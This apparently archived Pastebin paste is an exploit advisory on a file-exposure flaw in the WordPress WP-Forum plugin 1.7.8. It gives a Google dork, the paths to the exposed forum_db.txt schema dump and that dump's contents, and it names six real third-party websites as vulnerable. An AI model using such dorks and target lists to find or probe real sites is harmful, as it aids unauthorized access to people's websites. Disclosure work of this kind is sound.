API tools faq
paste
Advertisement
KingSkrupellos

WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure

KingSkrupellos
Mar 27th, 2019
152
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.26 KB | None | 0 0
raw download clone embed print report
  1. ###########################################################################
  2.  
  3. # Exploit Title : WordPress 2.0.2 WP-Forum Plugins 1.7.8 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 27/03/2019
  7. # Vendor Homepage : wordpress.org
  8. # Software Information Link :
  9. github.com/motdotla/annmotte.com/blob/master/wp-content/plugins/wp-forum/forum_db.txt
  10. wordpress.org/plugins/tags/wp-forum/
  11. # Software Affected Version : WordPress 2.0.2 and 2.1 / Plugin Version 1.7.8
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : High
  15. # Google Dorks : forum_db.txt inurl:/wp-content/plugins/wp-forum/
  16. # Vulnerability Type :
  17. CWE-200 [ Information Exposure ]
  18. CWE-538 [ File and Directory Information Exposure ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22. # Acunetix Information Link about phpMyAdmin SQL dump File =>
  23. acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
  24. # Reference Link : cxsecurity.com/ascii/WLB-2019030225
  25.  
  26. ###########################################################################
  27.  
  28. # Information About Software :
  29. ****************************
  30. Simple discussion forum plugin for WordPress. With support for different skins, 3 included
  31.  
  32. by default, changeable from the WP admin interface. Admin can choose if unregistered posting is
  33.  
  34. allowed and Captcha (optional) is used for spam control. Tight interaction with Wordpress
  35.  
  36. makes an easy to use and administer plugin.
  37.  
  38. # Installation :
  39. *************
  40. 1. Rename wpforum to wp-forum and copy it to to wp-content/plugins
  41. 1. Go and activate the plugin
  42. 1. Create a page from the Manage tab
  43. 1. Click on the HTML button in Wordpress and then insert: `<!--WPFORUM-->`
  44. 1. Go to manage->wp-forum and start adding groups and forums.
  45. 1. You must then visit the WP-Forum options panel in WP admin.
  46. 1. Setup a link to your forum (unless you have your pages auto-linking in the navigation menu)
  47. 1. To show the latest acitvity in the sidebar add this code:
  48. `<?php forum_latest_acivity(numbers_to_show);?>` where numbers_to_show is an actual number like 1,2,3
  49. 1. If you upload a new version go to plugin managment and deactivate and
  50. the activate WP-Forum. Visit the structure page of the wp-forum management.
  51.  
  52. ###########################################################################
  53.  
  54. # Impact :
  55. ***********
  56. * An information exposure is the intentional or unintentional disclosure of information to
  57.  
  58. an actor that is not explicitly authorized to have access to that information.
  59.  
  60. * The product stores sensitive information in files or directories that are accessible
  61.  
  62. to actors outside of the intended control sphere.
  63.  
  64. * phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
  65.  
  66. MySQL over the World Wide Web. It can be used to dump a database or a collection of databases
  67.  
  68. for backup or transfer to another SQL server (not necessarily a MySQL server).
  69.  
  70. The dump typically contains SQL statements to create the table, populate it, or both.
  71.  
  72. This file contains an phpMyAdmin SQL dump. This information is highly sensitive
  73.  
  74. and should not be found on a production system.
  75.  
  76. Remediation : Restrict access to this file or remove it from the system.
  77.  
  78. ###########################################################################
  79.  
  80. # Database Disclosure Exploit :
  81. ***************************
  82. /wp-content/plugins/wp-forum/forum_db.txt
  83.  
  84. /wp-content/plugins/wp-form/wpforum/forum_db.txt
  85.  
  86. # Information :
  87. **************
  88. -- phpMyAdmin SQL Dump
  89. -- version 2.7.0-pl2
  90. -- phpmyadmin.net
  91. --
  92. -- Host: localhost
  93. -- Server version: 5.0.19
  94. -- PHP Version: 5.1.4
  95. --
  96. -- Database: `wordpress`
  97. --
  98. -- --------------------------------------------------------
  99.  
  100. --
  101. -- Table structure for table `wp_forum_forums`
  102. --
  103.  
  104. CREATE TABLE `wp_forum_forums` (
  105. `id` int(11) NOT NULL auto_increment,
  106. `name` varchar(255) NOT NULL default '',
  107. `parent_id` int(11) NOT NULL default '0',
  108. `description` varchar(255) NOT NULL default '',
  109. `views` int(11) NOT NULL,
  110. PRIMARY KEY (`id`)
  111.  
  112. ) ;
  113.  
  114. -- --------------------------------------------------------
  115.  
  116. --
  117. -- Table structure for table `wp_forum_groups`
  118. --
  119.  
  120. CREATE TABLE `wp_forum_groups` (
  121. `id` int(11) NOT NULL auto_increment,
  122. `name` varchar(255) NOT NULL default '',
  123. PRIMARY KEY (`id`)
  124. ) ;
  125.  
  126. -- --------------------------------------------------------
  127.  
  128. --
  129. -- Table structure for table `wp_forum_posts`
  130. --
  131.  
  132. CREATE TABLE `wp_forum_posts` (
  133. `id` int(11) NOT NULL auto_increment,
  134. `author_name` varchar(255) default NULL,
  135. `author_email` varchar(255) default NULL,
  136. `author_web` varchar(255) default NULL,
  137. `text` longtext,
  138. `thread_id` int(11) NOT NULL default '0',
  139. `date` datetime NOT NULL default '0000-00-00 00:00:00',
  140. `author_id` int(11) NOT NULL,
  141. `subject` varchar(255) NOT NULL,
  142. `views` int(11) NOT NULL,
  143. PRIMARY KEY (`id`)
  144.  
  145. ) ;
  146.  
  147. -- --------------------------------------------------------
  148.  
  149. --
  150. -- Table structure for table `wp_forum_threads`
  151. --
  152.  
  153. CREATE TABLE `wp_forum_threads` (
  154. `id` int(11) NOT NULL auto_increment,
  155. `forum_id` int(11) NOT NULL default '0',
  156. `views` int(11) NOT NULL default '0',
  157. `subject` varchar(255) NOT NULL default '',
  158. `date` datetime NOT NULL default '0000-00-00 00:00:00',
  159. PRIMARY KEY (`id`)
  160. ) ;
  161.  
  162. ###########################################################################
  163.  
  164. # Example Vulnerable Sites :
  165. *************************
  166. [+] centres-animation-quartiers-bordeaux.eu/wp-content/plugins/wp-forum/forum_db.txt
  167.  
  168. [+] thebrashbrothers.com/wp-content/plugins/wpforum/forum_db.txt
  169.  
  170. [+] dgerard.com/news.41clubs.be/wp-content/plugins/wp-forum/forum_db.txt
  171.  
  172. [+] ridceo.rid.go.th/udornth/xxnongkungthanasan/wp-content/plugins/wp-form/wpforum/forum_db.txt
  173.  
  174. [+] templebaptistchurchonline.com/wordpress/wp-content/plugins/wp-forum/forum_db.txt
  175.  
  176. [+] templebaptist.church/wordpress/wp-content/plugins/wp-forum/forum_db.txt
  177.  
  178. ###########################################################################
  179.  
  180. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  181.  
  182. ###########################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!